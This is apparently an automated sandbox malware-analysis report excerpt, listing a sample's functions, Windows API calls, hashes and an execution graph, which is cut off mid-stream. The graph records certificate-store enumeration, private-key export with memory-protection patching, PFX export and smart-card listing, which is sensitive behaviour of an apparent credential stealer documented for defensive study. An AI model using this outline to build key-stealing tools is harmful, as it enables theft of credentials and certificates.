                                                                                                                            • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                            Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                            • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                                                                                            Function 00415650 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,004F23DC,00415CD5), ref: 00415658
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction ID: 5e48a04f9e11dcc7131419058854abdc843f7e17987eb29baea089ef08641d0b
                                                                                                                            • Opcode Fuzzy Hash: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction Fuzzy Hash: 79B092B05421009FE200CB60AE04B203AA8E308202F018461B904C21A0D6B14410CA28

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00415850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBW.KERNEL32(00000000,?), ref: 0041587D
                                                                                                                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004158C1
                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004158D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCalendarCommInfoNamePathShort
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 1570861727-2547889144
                                                                                                                            • Opcode ID: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction ID: 75a0542c090a1048562518fe0c410909b3098a1f030c9eacbf9327c34c692846
                                                                                                                            • Opcode Fuzzy Hash: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction Fuzzy Hash: 3A11C630940204DAD760EF64DC81BED7BF4FB48310F5181B9E588AA1C0CE745AD98B99
                                                                                                                            Function 00415910 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415944
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041595F
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 0041597E
                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 367530164-0
                                                                                                                            • Opcode ID: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction ID: c5ece5b07aa489753bf58a5f8e8b67b970329aa906d251dcea3a70d9a670a326
                                                                                                                            • Opcode Fuzzy Hash: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction Fuzzy Hash: BE01DBB0650108DFD710EB64ED457EA37A8E70C316F414436F609D7291DAB45D94CF5E

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:23.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4.6%
                                                                                                                            Total number of Nodes:857
                                                                                                                            Total number of Limit Nodes:31
                                                                                                                            execution_graph 4480 7ff7cbca6270 4481 7ff7cbca6293 4480->4481 4481->4481 4482 7ff7cbca7234 5 API calls 4481->4482 4483 7ff7cbca6302 4482->4483 4484 7ff7cbca7234 5 API calls 4483->4484 4485 7ff7cbca6321 4484->4485 4486 7ff7cbca7234 5 API calls 4485->4486 4487 7ff7cbca6340 4486->4487 4488 7ff7cbca7234 5 API calls 4487->4488 4489 7ff7cbca635f 4488->4489 4490 7ff7cbca7234 5 API calls 4489->4490 4491 7ff7cbca637e 4490->4491 4492 7ff7cbca6d30 4493 7ff7cbca6d51 4492->4493 4493->4493 4494 7ff7cbca7234 5 API calls 4493->4494 4495 7ff7cbca6dc0 4494->4495 4496 7ff7cbca7234 5 API calls 4495->4496 4497 7ff7cbca6e2d 4496->4497 4508 7ff7cbca72d4 4497->4508 4499 7ff7cbca6e4c 4513 7ff7cbca71ec 4499->4513 4501 7ff7cbca6e6b 4502 7ff7cbca71ec 5 API calls 4501->4502 4503 7ff7cbca6edd 4502->4503 4504 7ff7cbca7234 5 API calls 4503->4504 4505 7ff7cbca6f42 4504->4505 4506 7ff7cbca7234 5 API calls 4505->4506 4507 7ff7cbca6fa0 4506->4507 4509 7ff7cbca7310 5 API calls 4508->4509 4510 7ff7cbca72f1 4509->4510 4511 7ff7cbca7309 4510->4511 4512 7ff7cbca1a70 5 API calls 4510->4512 4511->4499 4512->4511 4514 7ff7cbca7310 5 API calls 4513->4514 4515 7ff7cbca7209 4514->4515 4516 7ff7cbca722e 4515->4516 4517 7ff7cbca1990 4 API calls 4515->4517 4516->4501 4517->4516 3974 7ff7cbca1968 3977 7ff7cbca25dc GetProcessHeap HeapAlloc 3974->3977 4531 7ff7cbcab428 4532 7ff7cbcab44b 4531->4532 4533 7ff7cbca1990 4 API calls 4532->4533 4534 7ff7cbcab456 4533->4534 4535 7ff7cbca1990 4 API calls 4534->4535 4536 7ff7cbcab465 4535->4536 4537 7ff7cbcab486 4536->4537 4538 7ff7cbcab889 4536->4538 4539 7ff7cbcab4af 4537->4539 4540 7ff7cbcab736 4537->4540 4541 7ff7cbca1990 4 API calls 4538->4541 4543 7ff7cbca1990 4 API calls 4539->4543 4544 7ff7cbca1990 4 API calls 4540->4544 4542 7ff7cbcab89d 4541->4542 4545 7ff7cbca1990 4 API calls 4542->4545 4583 7ff7cbcab4bf 4543->4583 4546 7ff7cbcab746 4544->4546 4547 7ff7cbcab8b1 4545->4547 4550 7ff7cbca1990 4 API calls 4546->4550 4548 7ff7cbca1a70 5 API calls 4547->4548 4551 7ff7cbcab887 4548->4551 4549 7ff7cbcab725 4552 7ff7cbca1990 4 API calls 4549->4552 4553 7ff7cbcab75a 4550->4553 4554 7ff7cbca1990 4 API calls 4551->4554 4557 7ff7cbcab734 4552->4557 4555 7ff7cbca1a70 5 API calls 4553->4555 4556 7ff7cbcab8d2 4554->4556 4555->4557 4558 7ff7cbca1990 4 API calls 4557->4558 4559 7ff7cbcab780 SCardListCardsW 4558->4559 4560 7ff7cbcab842 4559->4560 4561 7ff7cbcab7b9 4559->4561 4563 7ff7cbca1990 4 API calls 4560->4563 4564 7ff7cbca1990 4 API calls 4561->4564 4562 7ff7cbca19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4562->4583 4565 7ff7cbcab852 4563->4565 4576 7ff7cbcab7c9 4564->4576 4568 7ff7cbca1990 4 API calls 4565->4568 4566 7ff7cbcab52b SCardGetStatusChangeW 4566->4583 4567 7ff7cbcab824 4569 7ff7cbca1990 4 API calls 4567->4569 4570 7ff7cbcab866 4568->4570 4571 7ff7cbcab833 SCardFreeMemory 4569->4571 4572 7ff7cbca1a70 5 API calls 4570->4572 4573 7ff7cbcab878 4571->4573 4572->4573 4575 7ff7cbca1990 4 API calls 4573->4575 4574 7ff7cbca19e4 4 API calls 4574->4576 4575->4551 4576->4567 4576->4574 4577 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4576->4577 4577->4576 4578 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4578->4583 4579 7ff7cbca1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4579->4583 4580 7ff7cbcab5bf SCardListCardsW 4580->4583 4581 7ff7cbca1990 4 API calls 4582 7ff7cbcab676 SCardFreeMemory 4581->4582 4582->4583 4583->4549 4583->4562 4583->4566 4583->4578 4583->4579 4583->4580 4583->4581 4272 7ff7cbca2bac 4273 7ff7cbca2bc5 4272->4273 4274 7ff7cbca1990 4 API calls 4273->4274 4275 7ff7cbca2bdc 4274->4275 4276 7ff7cbca19e4 4 API calls 4275->4276 4277 7ff7cbca2bec 4276->4277 4278 7ff7cbca1990 4 API calls 4277->4278 4279 7ff7cbca2c00 CertOpenStore 4278->4279 4280 7ff7cbca2c24 4279->4280 4284 7ff7cbca2c48 4279->4284 4281 7ff7cbca1990 4 API calls 4280->4281 4282 7ff7cbca2c38 4281->4282 4287 7ff7cbca2d5c CertEnumCertificatesInStore 4282->4287 4285 7ff7cbca1990 4 API calls 4284->4285 4286 7ff7cbca2cbd CertCloseStore 4285->4286 4288 7ff7cbca319c 4287->4288 4294 7ff7cbca2daa 4287->4294 4290 7ff7cbca31ad 4288->4290 4291 7ff7cbca25b4 2 API calls 4288->4291 4289 7ff7cbca2db0 CertGetNameStringW 4289->4294 4290->4284 4291->4290 4292 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4292->4294 4293 7ff7cbca19e4 4 API calls 4293->4294 4294->4289 4294->4292 4294->4293 4295 7ff7cbca1990 4 API calls 4294->4295 4296 7ff7cbca2e8e CertNameToStrW 4295->4296 4298 7ff7cbca2eca 4296->4298 4297 7ff7cbca1990 4 API calls 4297->4298 4298->4297 4299 7ff7cbca19e4 4 API calls 4298->4299 4300 7ff7cbca1990 4 API calls 4298->4300 4299->4298 4301 7ff7cbca2eec CertNameToStrW 4300->4301 4303 7ff7cbca2f1c 4301->4303 4302 7ff7cbca1990 4 API calls 4302->4303 4303->4302 4304 7ff7cbca19e4 4 API calls 4303->4304 4305 7ff7cbca1990 4 API calls 4303->4305 4304->4303 4306 7ff7cbca2f3e FileTimeToSystemTime 4305->4306 4307 7ff7cbca2f84 4306->4307 4308 7ff7cbca1a70 5 API calls 4307->4308 4309 7ff7cbca2faf FileTimeToSystemTime 4308->4309 4313 7ff7cbca2ffa 4309->4313 4310 7ff7cbca1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4310->4313 4311 7ff7cbca79f0 2 API calls 4311->4313 4312 7ff7cbca25b4 2 API calls 4312->4313 4313->4310 4313->4311 4313->4312 4315 7ff7cbca1990 4 API calls 4313->4315 4320 7ff7cbca308d 4313->4320 4316 7ff7cbca316e CertEnumCertificatesInStore 4315->4316 4316->4288 4316->4289 4318 7ff7cbca25b4 2 API calls 4318->4320 4319 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4319->4320 4320->4313 4320->4318 4320->4319 4321 7ff7cbca25b4 2 API calls 4320->4321 4322 7ff7cbca3220 CertGetCertificateContextProperty 4320->4322 4349 7ff7cbcaa778 4320->4349 4321->4313 4323 7ff7cbca348c 4322->4323 4324 7ff7cbca326c CryptAcquireCertificatePrivateKey 4322->4324 4323->4320 4324->4323 4325 7ff7cbca329b 4324->4325 4326 7ff7cbca32b4 CryptGetUserKey 4325->4326 4327 7ff7cbca34a9 OpenSCManagerA 4325->4327 4326->4323 4329 7ff7cbca32c9 4326->4329 4328 7ff7cbca34dd 4327->4328 4331 7ff7cbca34fb 6 API calls 4328->4331 4353 7ff7cbca36f0 4329->4353 4332 7ff7cbca35d1 4331->4332 4363 7ff7cbca25dc GetProcessHeap HeapAlloc 4332->4363 4333 7ff7cbca32e5 4333->4323 4335 7ff7cbca3333 LoadLibraryA 4333->4335 4337 7ff7cbca335f 4335->4337 4339 7ff7cbca337a GetProcAddress VirtualProtect 4337->4339 4338 7ff7cbca361d 4340 7ff7cbca3652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4338->4340 4341 7ff7cbca33c1 4339->4341 4364 7ff7cbca25dc GetProcessHeap HeapAlloc 4340->4364 4344 7ff7cbca33d0 VirtualProtect CryptExportKey 4341->4344 4344->4323 4345 7ff7cbca340e VirtualProtect 4344->4345 4361 7ff7cbca262c 4345->4361 4347 7ff7cbca3432 VirtualProtect CryptAcquireContextA 4347->4323 4348 7ff7cbca3463 CryptImportKey 4347->4348 4348->4323 4348->4338 4350 7ff7cbcaa7a0 4349->4350 4366 7ff7cbca25dc GetProcessHeap HeapAlloc 4350->4366 4354 7ff7cbca3728 CryptExportKey 4353->4354 4359 7ff7cbca370f 4353->4359 4355 7ff7cbca37ac 4354->4355 4356 7ff7cbca374e 4354->4356 4365 7ff7cbca25dc GetProcessHeap HeapAlloc 4355->4365 4357 7ff7cbca37a8 4356->4357 4360 7ff7cbca3766 CryptExportKey 4356->4360 4357->4333 4359->4354 4360->4355 4360->4357 4362 7ff7cbca2634 4361->4362 4362->4347 4362->4362 4584 7ff7cbca69ec 4585 7ff7cbca6a0f 4584->4585 4585->4585 4586 7ff7cbca7234 5 API calls 4585->4586 4587 7ff7cbca6a7e 4586->4587 4588 7ff7cbca7234 5 API calls 4587->4588 4589 7ff7cbca6aed 4588->4589 4590 7ff7cbca72d4 5 API calls 4589->4590 4591 7ff7cbca6b0c 4590->4591 4592 7ff7cbca5fac 4593 7ff7cbca5fc2 4592->4593 4594 7ff7cbca7234 5 API calls 4593->4594 4595 7ff7cbca5ff0 4594->4595 4596 7ff7cbcae3ac lstrcpyW PathAppendW 4597 7ff7cbcae423 4596->4597 4612 7ff7cbcaccf8 RegGetValueW 4597->4612 4600 7ff7cbcae4ba 4601 7ff7cbca1990 4 API calls 4602 7ff7cbcae476 4601->4602 4603 7ff7cbca19e4 4 API calls 4602->4603 4604 7ff7cbcae481 4603->4604 4605 7ff7cbca1990 4 API calls 4604->4605 4606 7ff7cbcae490 4605->4606 4607 7ff7cbca19e4 4 API calls 4606->4607 4608 7ff7cbcae49f 4607->4608 4609 7ff7cbca1990 4 API calls 4608->4609 4610 7ff7cbcae4ae 4609->4610 4611 7ff7cbca25b4 2 API calls 4610->4611 4611->4600 4613 7ff7cbcacd41 4612->4613 4614 7ff7cbcacd80 4612->4614 4619 7ff7cbca2588 GetProcessHeap HeapAlloc 4613->4619 4614->4600 4614->4601 4620 7ff7cbca6758 4621 7ff7cbca677b 4620->4621 4622 7ff7cbca7234 5 API calls 4621->4622 4623 7ff7cbca67ea 4622->4623 4624 7ff7cbca7234 5 API calls 4623->4624 4625 7ff7cbca6859 4624->4625 4626 7ff7cbca7234 5 API calls 4625->4626 4627 7ff7cbca6878 4626->4627 4628 7ff7cbca7234 5 API calls 4627->4628 4629 7ff7cbca6897 4628->4629 4630 7ff7cbca7234 5 API calls 4629->4630 4631 7ff7cbca68b6 4630->4631 4367 7ff7cbca2b1c 4368 7ff7cbca1990 4 API calls 4367->4368 4369 7ff7cbca2b42 4368->4369 4370 7ff7cbca19e4 4 API calls 4369->4370 4371 7ff7cbca2b4d 4370->4371 4372 7ff7cbca1990 4 API calls 4371->4372 4373 7ff7cbca2b5c 4372->4373 4374 7ff7cbca1990 4 API calls 4373->4374 4375 7ff7cbca2b6b CertEnumSystemStore 4374->4375 4376 7ff7cbca1990 4 API calls 4375->4376 4377 7ff7cbca2b94 4376->4377 4632 7ff7cbca639c 4633 7ff7cbca63c7 4632->4633 4633->4633 4634 7ff7cbca7234 5 API calls 4633->4634 4635 7ff7cbca6449 4634->4635 4636 7ff7cbca7234 5 API calls 4635->4636 4637 7ff7cbca6468 4636->4637 4638 7ff7cbca7234 5 API calls 4637->4638 4639 7ff7cbca6487 4638->4639 4640 7ff7cbca7234 5 API calls 4639->4640 4641 7ff7cbca64ed 4640->4641 4642 7ff7cbca7234 5 API calls 4641->4642 4643 7ff7cbca650c 4642->4643 4644 7ff7cbca7234 5 API calls 4643->4644 4645 7ff7cbca652b 4644->4645 4670 7ff7cbca7298 4645->4670 4647 7ff7cbca654a 4648 7ff7cbca7234 5 API calls 4647->4648 4649 7ff7cbca6569 4648->4649 4650 7ff7cbca7234 5 API calls 4649->4650 4651 7ff7cbca6588 4650->4651 4652 7ff7cbca7234 5 API calls 4651->4652 4653 7ff7cbca65f7 4652->4653 4654 7ff7cbca7234 5 API calls 4653->4654 4655 7ff7cbca6616 4654->4655 4656 7ff7cbca72d4 5 API calls 4655->4656 4657 7ff7cbca6635 4656->4657 4658 7ff7cbca72d4 5 API calls 4657->4658 4659 7ff7cbca6654 4658->4659 4660 7ff7cbca72d4 5 API calls 4659->4660 4661 7ff7cbca66b7 4660->4661 4662 7ff7cbca7234 5 API calls 4661->4662 4663 7ff7cbca66d6 4662->4663 4664 7ff7cbca7234 5 API calls 4663->4664 4665 7ff7cbca66f5 4664->4665 4666 7ff7cbca7234 5 API calls 4665->4666 4667 7ff7cbca6714 4666->4667 4668 7ff7cbca7234 5 API calls 4667->4668 4669 7ff7cbca6733 4668->4669 4671 7ff7cbca7310 5 API calls 4670->4671 4672 7ff7cbca72b5 4671->4672 4673 7ff7cbca72ce 4672->4673 4674 7ff7cbca1a70 5 API calls 4672->4674 4673->4647 4674->4673 4690 7ff7cbca14d4 4691 7ff7cbca1507 4690->4691 4692 7ff7cbca14ea 4690->4692 4692->4691 4693 7ff7cbca1501 RemoveVectoredExceptionHandler 4692->4693 4693->4691 4694 7ff7cbca68d4 4695 7ff7cbca68f7 4694->4695 4695->4695 4696 7ff7cbca7234 5 API calls 4695->4696 4697 7ff7cbca6971 4696->4697 4698 7ff7cbca7234 5 API calls 4697->4698 4699 7ff7cbca6990 4698->4699 4700 7ff7cbca7234 5 API calls 4699->4700 4701 7ff7cbca69af 4700->4701 4702 7ff7cbca72d4 5 API calls 4701->4702 4703 7ff7cbca69ce 4702->4703 4704 7ff7cbca6054 4705 7ff7cbca6077 4704->4705 4705->4705 4706 7ff7cbca7234 5 API calls 4705->4706 4707 7ff7cbca60f1 4706->4707 4708 7ff7cbca7234 5 API calls 4707->4708 4709 7ff7cbca6110 4708->4709 4710 7ff7cbca7234 5 API calls 4709->4710 4711 7ff7cbca612f 4710->4711 4712 7ff7cbca7234 5 API calls 4711->4712 4713 7ff7cbca619e 4712->4713 4714 7ff7cbca7234 5 API calls 4713->4714 4715 7ff7cbca61bd 4714->4715 4716 7ff7cbca72d4 5 API calls 4715->4716 4717 7ff7cbca61dc 4716->4717 4726 7ff7cbcae4d4 lstrcpyW PathAppendW 4727 7ff7cbcae520 4726->4727 4728 7ff7cbcaccf8 6 API calls 4727->4728 4730 7ff7cbcae53b 4728->4730 4729 7ff7cbcae5ee 4730->4729 4731 7ff7cbca1990 4 API calls 4730->4731 4732 7ff7cbcae55a 4731->4732 4733 7ff7cbca19e4 4 API calls 4732->4733 4734 7ff7cbcae565 4733->4734 4735 7ff7cbca1990 4 API calls 4734->4735 4736 7ff7cbcae57c 4735->4736 4737 7ff7cbca19e4 4 API calls 4736->4737 4738 7ff7cbcae58b 4737->4738 4738->4738 4739 7ff7cbca1990 4 API calls 4738->4739 4740 7ff7cbcae5e2 4739->4740 4741 7ff7cbca25b4 2 API calls 4740->4741 4741->4729 3978 7ff7cbca9ac8 3979 7ff7cbca9af7 3978->3979 3980 7ff7cbca1990 4 API calls 3979->3980 3981 7ff7cbca9b02 3980->3981 4115 7ff7cbca9644 3981->4115 3983 7ff7cbca9b0b 3983->3983 4120 7ff7cbca900c 3983->4120 3986 7ff7cbcaa4e7 3988 7ff7cbca1990 4 API calls 3986->3988 3989 7ff7cbcaa4ff 3988->3989 3990 7ff7cbca9b7d 3990->3986 4155 7ff7cbca97dc 3990->4155 3993 7ff7cbca1990 4 API calls 3994 7ff7cbca9bb7 3993->3994 3995 7ff7cbca97dc 16 API calls 3994->3995 3996 7ff7cbca9bcf 3995->3996 3996->3986 3997 7ff7cbca1990 4 API calls 3996->3997 3998 7ff7cbca9be2 3997->3998 3999 7ff7cbca97dc 16 API calls 3998->3999 4000 7ff7cbca9bfa 3999->4000 4000->3986 4001 7ff7cbca1990 4 API calls 4000->4001 4002 7ff7cbca9c0d 4001->4002 4003 7ff7cbca97dc 16 API calls 4002->4003 4004 7ff7cbca9c25 4003->4004 4004->3986 4005 7ff7cbca1990 4 API calls 4004->4005 4006 7ff7cbca9c38 4005->4006 4007 7ff7cbca97dc 16 API calls 4006->4007 4008 7ff7cbca9c50 4007->4008 4008->3986 4009 7ff7cbca1990 4 API calls 4008->4009 4010 7ff7cbca9c63 4009->4010 4011 7ff7cbca97dc 16 API calls 4010->4011 4012 7ff7cbca9c7b 4011->4012 4012->3986 4013 7ff7cbca1990 4 API calls 4012->4013 4014 7ff7cbca9c8e 4013->4014 4015 7ff7cbca97dc 16 API calls 4014->4015 4016 7ff7cbca9ca6 4015->4016 4016->3986 4017 7ff7cbca1990 4 API calls 4016->4017 4018 7ff7cbca9cb9 4017->4018 4019 7ff7cbca97dc 16 API calls 4018->4019 4020 7ff7cbca9cd1 4019->4020 4020->3986 4021 7ff7cbca1990 4 API calls 4020->4021 4022 7ff7cbca9ce4 4021->4022 4023 7ff7cbca97dc 16 API calls 4022->4023 4024 7ff7cbca9cfc 4023->4024 4024->3986 4025 7ff7cbca1990 4 API calls 4024->4025 4026 7ff7cbca9d0f 4025->4026 4027 7ff7cbca97dc 16 API calls 4026->4027 4028 7ff7cbca9d27 4027->4028 4028->3986 4029 7ff7cbca1990 4 API calls 4028->4029 4030 7ff7cbca9d3a 4029->4030 4031 7ff7cbca97dc 16 API calls 4030->4031 4032 7ff7cbca9d52 4031->4032 4032->3986 4033 7ff7cbca1990 4 API calls 4032->4033 4034 7ff7cbca9d65 4033->4034 4035 7ff7cbca97dc 16 API calls 4034->4035 4036 7ff7cbca9d7d 4035->4036 4036->3986 4037 7ff7cbca1990 4 API calls 4036->4037 4038 7ff7cbca9d90 4037->4038 4039 7ff7cbca97dc 16 API calls 4038->4039 4040 7ff7cbca9da8 4039->4040 4040->3986 4041 7ff7cbca1990 4 API calls 4040->4041 4042 7ff7cbca9dbb 4041->4042 4043 7ff7cbca97dc 16 API calls 4042->4043 4044 7ff7cbca9dd3 4043->4044 4044->3986 4045 7ff7cbca1990 4 API calls 4044->4045 4046 7ff7cbca9de6 4045->4046 4046->4046 4047 7ff7cbca97dc 16 API calls 4046->4047 4048 7ff7cbca9e4c 4047->4048 4048->3986 4049 7ff7cbca1990 4 API calls 4048->4049 4050 7ff7cbca9e5f 4049->4050 4050->4050 4051 7ff7cbca97dc 16 API calls 4050->4051 4052 7ff7cbca9eba 4051->4052 4052->3986 4053 7ff7cbca1990 4 API calls 4052->4053 4054 7ff7cbca9ecd 4053->4054 4054->4054 4055 7ff7cbca97dc 16 API calls 4054->4055 4056 7ff7cbca9f2f 4055->4056 4056->3986 4057 7ff7cbca1990 4 API calls 4056->4057 4058 7ff7cbca9f42 4057->4058 4058->4058 4059 7ff7cbca97dc 16 API calls 4058->4059 4060 7ff7cbca9f99 4059->4060 4060->3986 4061 7ff7cbca1990 4 API calls 4060->4061 4062 7ff7cbca9fac 4061->4062 4062->4062 4063 7ff7cbca97dc 16 API calls 4062->4063 4064 7ff7cbcaa002 4063->4064 4064->3986 4065 7ff7cbca1990 4 API calls 4064->4065 4066 7ff7cbcaa015 4065->4066 4066->4066 4067 7ff7cbca97dc 16 API calls 4066->4067 4068 7ff7cbcaa072 4067->4068 4068->3986 4069 7ff7cbca1990 4 API calls 4068->4069 4070 7ff7cbcaa085 4069->4070 4070->4070 4071 7ff7cbca97dc 16 API calls 4070->4071 4072 7ff7cbcaa0db 4071->4072 4072->3986 4073 7ff7cbca1990 4 API calls 4072->4073 4074 7ff7cbcaa0ee 4073->4074 4074->4074 4075 7ff7cbca97dc 16 API calls 4074->4075 4076 7ff7cbcaa14b 4075->4076 4076->3986 4077 7ff7cbca1990 4 API calls 4076->4077 4078 7ff7cbcaa162 4077->4078 4078->4078 4079 7ff7cbca97dc 16 API calls 4078->4079 4080 7ff7cbcaa1bb 4079->4080 4080->3986 4081 7ff7cbca1990 4 API calls 4080->4081 4082 7ff7cbcaa1d2 4081->4082 4082->4082 4083 7ff7cbca97dc 16 API calls 4082->4083 4084 7ff7cbcaa221 4083->4084 4084->3986 4085 7ff7cbca1990 4 API calls 4084->4085 4086 7ff7cbcaa238 4085->4086 4086->4086 4087 7ff7cbca97dc 16 API calls 4086->4087 4088 7ff7cbcaa289 4087->4088 4088->3986 4089 7ff7cbca1990 4 API calls 4088->4089 4090 7ff7cbcaa2a0 4089->4090 4090->4090 4091 7ff7cbca97dc 16 API calls 4090->4091 4092 7ff7cbcaa2e6 4091->4092 4092->3986 4093 7ff7cbca1990 4 API calls 4092->4093 4094 7ff7cbcaa2fd 4093->4094 4094->4094 4095 7ff7cbca97dc 16 API calls 4094->4095 4096 7ff7cbcaa34b 4095->4096 4096->3986 4097 7ff7cbca1990 4 API calls 4096->4097 4098 7ff7cbcaa365 4097->4098 4098->4098 4099 7ff7cbca97dc 16 API calls 4098->4099 4100 7ff7cbcaa3af 4099->4100 4100->3986 4101 7ff7cbca1990 4 API calls 4100->4101 4102 7ff7cbcaa3c2 4101->4102 4102->4102 4103 7ff7cbca97dc 16 API calls 4102->4103 4104 7ff7cbcaa423 4103->4104 4104->3986 4105 7ff7cbca1990 4 API calls 4104->4105 4106 7ff7cbcaa436 4105->4106 4106->4106 4107 7ff7cbca97dc 16 API calls 4106->4107 4108 7ff7cbcaa485 4107->4108 4108->3986 4109 7ff7cbca1990 4 API calls 4108->4109 4110 7ff7cbcaa494 4109->4110 4110->4110 4111 7ff7cbca97dc 16 API calls 4110->4111 4112 7ff7cbcaa4da 4111->4112 4112->3986 4113 7ff7cbcaa4de 4112->4113 4204 7ff7cbca9478 4113->4204 4220 7ff7cbcae7cc 4115->4220 4118 7ff7cbcae7cc 2 API calls 4119 7ff7cbca9672 4118->4119 4119->3983 4224 7ff7cbca2554 4120->4224 4123 7ff7cbca90a3 CreatePipe 4124 7ff7cbca90e8 CreatePipe 4123->4124 4125 7ff7cbca90c1 4123->4125 4126 7ff7cbca9106 4124->4126 4132 7ff7cbca9130 4124->4132 4129 7ff7cbca1990 4 API calls 4125->4129 4131 7ff7cbca1990 4 API calls 4126->4131 4127 7ff7cbca9069 4128 7ff7cbca1990 4 API calls 4127->4128 4130 7ff7cbca907d GetLastError 4128->4130 4133 7ff7cbca90d5 GetLastError 4129->4133 4135 7ff7cbca908e 4130->4135 4134 7ff7cbca911a GetLastError 4131->4134 4226 7ff7cbca7cfc 4132->4226 4133->4135 4134->4135 4233 7ff7cbca1a70 4135->4233 4138 7ff7cbca909c 4138->3986 4147 7ff7cbca95a0 WaitForSingleObject 4138->4147 4139 7ff7cbca917b CreateProcessW 4230 7ff7cbca25b4 4139->4230 4141 7ff7cbca91c7 4142 7ff7cbca91f5 CloseHandle 4141->4142 4143 7ff7cbca91cb 4141->4143 4142->4138 4144 7ff7cbca1990 4 API calls 4143->4144 4145 7ff7cbca91df GetLastError 4144->4145 4146 7ff7cbca91f0 4145->4146 4146->4142 4148 7ff7cbca95c3 4147->4148 4149 7ff7cbca9600 4147->4149 4151 7ff7cbca95d4 4148->4151 4237 7ff7cbca968c PeekNamedPipe 4148->4237 4149->3990 4151->4149 4152 7ff7cbca95ee GetExitCodeProcess 4151->4152 4153 7ff7cbca968c 6 API calls 4151->4153 4152->4149 4154 7ff7cbca95ea 4153->4154 4154->4149 4154->4152 4156 